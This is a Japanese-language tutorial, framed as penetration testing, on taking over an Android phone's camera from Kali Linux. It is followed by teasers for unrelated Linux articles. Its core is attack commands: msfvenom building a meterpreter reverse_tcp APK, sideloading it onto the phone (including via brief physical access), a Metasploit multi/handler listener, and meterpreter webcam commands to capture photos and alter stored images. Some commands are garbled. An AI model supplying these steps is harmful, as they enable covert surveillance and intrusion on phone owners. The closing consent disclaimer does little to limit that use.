KaliLinuxを使用してAndroid携帯カメラで侵入テストを実行する方法
ハッカーがAndroid携帯電話のカメラを乗っ取ってユーザーを盗聴したり、偽の画像を提供したりするというニュース記事がいくつかあります。アラート電話の所有者として、このような脅威イベントの可能性と真のリスクを評価することで、それを防止しようとしている可能性があります。
Kali Linuxは、侵入テストを通じてAndroidフォンカメラの潜在的な脆弱性をチェックするための最良のツールの1つです。これは、ハッカーが電話のカメラにリモートアクセスしようとする試みを常に把握するのに役立ちます。
エクスプロイトペイロードのインストール
Kali Linuxを侵入テストに使用するには、まず公式サイトからダウンロードします。この演習で使用される「msfvenom」、「msfconsole」、「meterpreter」などのさまざまな専門用語の定義については、この以前のチュートリアルを参照してください。
ペネトレーションテストの最初のステップは、デバイスに標準のエクスプロイトペイロードをインストールすることです。このためには、Kali Linuxターミナルを開き、次のコマンドを入力します:ifconfig
。これにより、KaliLinuxセッションのIPアドレスがわかります。
次に、上記のIPアドレスを使用して以下に示すコマンドを入力します。エクスプロイト、トロイの木馬、およびその他の脆弱性のポート番号は、通常4444として指定されています。
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
このステップでは、Javaインタープリターに基づくmetasploitペイロードを注入してみてください。成功した場合、侵入テストは、電話を聞いている人、SMSにアクセスしている人、ユーザーの地理的位置を特定している人などに対して電話が脆弱かどうかを確認するのに役立ちます。
この場合の試みは、エクスプロイトを使用して携帯電話のカメラにアクセスする方法を示すことです。
エクスプロイトが開始されると、「ペイロード」と呼ばれるAPKファイルがルートフォルダにインストールされます。ターゲットのAndroid携帯にインストールする必要があります。ただし、言うのは簡単です。ほとんどの新しいAndroid携帯電話と電子メールはそのようなマルウェアに感染したファイルを運ぶことを拒否します、そしてそれは良いことです。
ただし、それでもUSBケーブルまたは一時ファイルを使用して実現できます。ハッカーが数分間あなたの電話にアクセスできる場合、それはそれを幾分脆弱にします。この侵入テストでの私たちの取り組みは、関連するリスクの正確な範囲を特定することです。
転送したら、ペイロードファイルを携帯電話にインストールする方法を見つける必要があります。非常に古いAndroidバージョンでない限り、APKをインストールする前に、スマートフォンからいくつかの警告が表示されます。それでも、Androidスマートフォンのバージョンに関係なく、Androidスマートフォンに不明なソースからアプリをインストールする方法は他にもたくさんあります。
エクスプロイトの起動
上記のペイロードエクスプロイトを起動するには、次のコマンドを挿入します:msfconsole
。コマンドが実行されるまでに数秒かかります。metasploitは、スマートフォンのカメラでさらに侵入テストを行う準備ができています。
metasploitは、独自の完全な説明を提供します。ペイロードの概要も表示されます。動作中のエクスプロイトの数を示しています。
次のステップで、msfconsoleはエクスプロイトを起動する準備ができています。これについては、前述のIPアドレスとポート番号(4444)を参照してください。したがって、次のコマンドを入力します。
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]
リバースTCPハンドラーがアクティブ化されると、Meterpreterがそれ自体を起動するさまざまな段階が表示されます。対象の電話を診断するまで数秒待ちます。
ここで言及しなければならないのは、最近のほとんどのAndroidフォンはこのアクセスを拒否し続けるということです。これは侵入テストであることを忘れないでください。この致命的なAPKファイルを使用してAndroidスマートフォンに侵入できない場合は、スマートフォンの製造元がこの特定の攻撃ベクトルを認識していることを意味します。
Androidフォンのカメラへのアクセス
エクスプロイトを電話に正常に挿入できた場合は、侵入できる可能性があります。その場合、KaliLinux端末の「meterpreter」が電話との接続を確立できるようになります。この時点で、help
を挿入します 攻撃を受けているAndroid携帯内の複数のオプションにアクセスします。
(ヘルプメニューから)次のコマンドを入力して、電話のカメラにアクセスします。このエクスプロイトでは、端末から写真を撮るためにバックカメラにアクセスする試みがありました。
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
ペネトレーションテストを成功させるには、カメラにアクセスできるようになったら、写真を撮り、KaliLinuxのルートフォルダーに保存します。保存されている他の画像を編集、名前変更、または削除することもできます。したがって、テストされた電話への侵入が成功した場合は、実際の攻撃の可能性に関するモーニングコールになります。つまり、セキュリティパッチを適用するときが来たということです。
このチュートリアルでは、侵入テストのためにKaliLinuxターミナルからAndroidカメラにアクセスする方法を学びました。
これはセキュリティ研究の記事です。デモンストレーションのために他の人のカメラにアクセスしている場合は、もちろん自分の電話でない限り、常に最初にその人の許可を取得してください。スマートフォンの脆弱性をテストして見つけるのに役立つ、Android向けのこれらのハッキングアプリをチェックすることを忘れないでください
-
WSL を使用して Windows 10 および 11 で Linux アプリを実行する方法
私はかなり長い間、OS クラスに Windows Subsystem for Linux (WSL) を使用してきました。また、仮想マシンのインストールやデュアル ブートの複雑さを増すことなく、Windows で Linux コマンドを簡単な方法で使用できる点も気に入っています。 この記事の終わりまでに、次のように Windows から直接 Linux コマンドを実行できるはずです: Windows での Linux コマンドの例 前提条件 WSL を効果的に実行するには、Windows 11 にアップグレードすることをお勧めします。WSL は Windows 10 でも利用できますが、
-
Android-x86 を使用して Linux で Android ゲームを実行する方法
この記事では、ビンテージ ゲームを楽しみながら Linux で仮想マシンを使用する方法を学びます。 Android フォンをお持ちの場合、有罪の喜びの 1 つは、非常に面白いゲームをプレイすることかもしれません。または、携帯電話でのみ実行されるアプリケーションがある可能性もあります。 そして、デスクトップ PC で同じゲームを実行できるとしたらどうでしょうか? シナリオを単純化するために、アプリケーションが Android で実行されると仮定しましょう。 問題を解決する 1 つの方法は、PC で Android エミュレーターを実行することです。ただし、Android-x86 のように